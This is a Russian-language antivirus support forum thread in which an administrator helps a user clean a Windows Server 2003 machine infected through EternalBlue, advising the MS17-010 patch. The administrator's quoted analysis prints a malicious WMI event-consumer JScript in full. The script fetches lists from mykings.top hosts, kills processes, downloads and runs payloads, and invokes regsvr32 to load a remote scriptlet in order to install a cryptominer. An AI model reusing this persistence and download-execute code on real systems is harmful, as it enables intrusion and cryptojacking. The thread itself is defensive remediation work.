Вход
Уважаемые пользователи!

Поставщик ИТ-решений PRO32 сообщает вам, что после 17 лет сотрудничества мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.

Купить и продлить лицензии ESET на нашем сайте больше нельзя.

Предлагаем вам попробовать новый антивирус от компании PRO32.

Продукты PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств на Windows / Android.

Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.

Перейти на PRO32
Поиск  Пользователи  Правила  Войти
Центр вирусных исследований и аналитики Обнаружение вредоносного кода и ложные срабатывания

[ Закрыто ] Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; , ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER

RSS
 
Андрей Пахомов
Андрей Пахомов
Пользователь
Сообщений: 6
Баллов: 3
Регистрация: 09.06.2017
Размещено 09.06.2017 11:19:02
Как видим, троян и процессы, её запускающие, не удаляются. В планировщике появилось 2 новых задания. В автозапуске 2 новых процесса. Как понял, троян появился только-только. Первые упоминания с 1 июня в сети. НОД пока что только обнаруживает и удаляет создаваемый исполняемый файл.

WinServ2003, NOD32 File Security

Скрытый текст

Ответы

Пред. 1 2
 
RP55 RP55
RP55 RP55
Пользователь
Сообщений: 6234
Баллов: 4987
Регистрация: 25.05.2010
Размещено 09.06.2017 19:38:09
Работают люди :)  ;)
Изменено: RP55 RP55 - 09.06.2017 19:38:34
 
santy
santy
Администратор
Сообщений: 17962
Баллов: 14369
Регистрация: 16.03.2010
Размещено 09.06.2017 19:53:50
Андрей Пахомов,
вам необходимо пропатчить систему, чтобы после ее очистки она опять же не подверглась атаке

Цитата
Требуется установка обновления KB4012598, если у вас следующие операционные системы:

   Windows 8, Windows XP SP3, Windows XP SP2 64-bit, Windows Server 2008 for Itanium-based Systems, Windows Vista, Windows Server 2008, Windows XP Embedded, Windows Server 2003, Windows Server 2003 Datacenter Edition.

https://www.comss.ru/download/page.php?id=4016

для вашей системы

Microsoft Windows Server 2003 R2 x86 (NT v5.2 SP2) build 3790 Service Pack 2 [C:\WINDOWS]

патч MS-2017-010 скачать отсюда:

http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598
[ Как создать образ автозапуска? ]
 
Андрей Пахомов
Андрей Пахомов
Пользователь
Сообщений: 6
Баллов: 3
Регистрация: 09.06.2017
Размещено 13.06.2017 09:39:14
Политики, задания и пр. поудалял.
Проверяю сейчас антимэйлваром.
Файл архивировать и отправлять пока не буду,
Нод успешно его на подлёте сносит.
Винду пропатчил, буду наблюдать.
Спасибо всем за помощь!  
 
santy
santy
Администратор
Сообщений: 17962
Баллов: 14369
Регистрация: 16.03.2010
Размещено 13.06.2017 09:47:43
скрипт в uVS выполнили?

файл c2.bat как раз нам интересен, потому что в образ он (список команд бат файла) попадает не полностью.
[ Как создать образ автозапуска? ]
 
Андрей Пахомов
Андрей Пахомов
Пользователь
Сообщений: 6
Баллов: 3
Регистрация: 09.06.2017
Размещено 13.06.2017 10:12:51
Нет, не выполнил. Т.к. смогу это сделать только ночью, когда все будут отключены от сервера.
Файл тоже постараюсь сегодня поймать.  
 
santy
santy
Администратор
Сообщений: 17962
Баллов: 14369
Регистрация: 16.03.2010
Размещено 13.06.2017 10:21:48
скрипт надо выполнить обязательно, потому что он очищает левый обработчик событий WMI.

этот обработчик и добавляет вам в систему вредоносные файлы из сети, которые пока гасятся антивирусом.

Цитата
Полное имя WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
Имя файла FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
Тек. статус ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске

Удовлетворяет критериям
WMI_ACTIVESCRIPTEVENTCONSUMER(CONSUMER_NAME ~ FUCKYOUMM2_CONSUMER)(1) [delall (0)]

Сохраненная информация на момент создания образа
Статус в автозапуске

Namespace \\.\root\subscription
Consumer_Name fuckyoumm2_consumer
Consumer_Class ActiveScriptEventConsumer
Consumer_ScriptingEngine Jscript
Consumer_ScriptText var toff=3000;var url1 = "][ттп://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr[i].split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="][ттп://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr[i].split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:][ттп://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");
Filter_Name fuckyoumm2_filter
Filter_Class __EventFilter
Filter_Query select * from __timerevent where timerid="fuckyoumm2_itimer"
#MOF_Bind#
instance of __FilterToConsumerBinding
{
Consumer = "\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name="fuckyoumm2_consumer"";
Filter = "\\\\.\\root\\subscription:__EventFilter.Name="fuckyoumm2_filter"";
};

#MOF_Event#
instance of __EventFilter
{
Name = "fuckyoumm2_filter";
Query = "select * from __timerevent where timerid="fuckyoumm2_itimer"";
QueryLanguage = "wql";
};

через этот обработчик выполняется попытка установить в систему майнер криптовалюты.
[ Как создать образ автозапуска? ]
 
Дмитрий
Дмитрий
Модератор
Сообщений: 12962
Баллов: 10371
Регистрация: 16.03.2010
Размещено 13.06.2017 11:53:38
Цитата
santy написал:
файл c2.bat как раз нам интересен

Вчера подобный файл внесли в базу как угрозу... :)
 
Пред. 1 2
Читают тему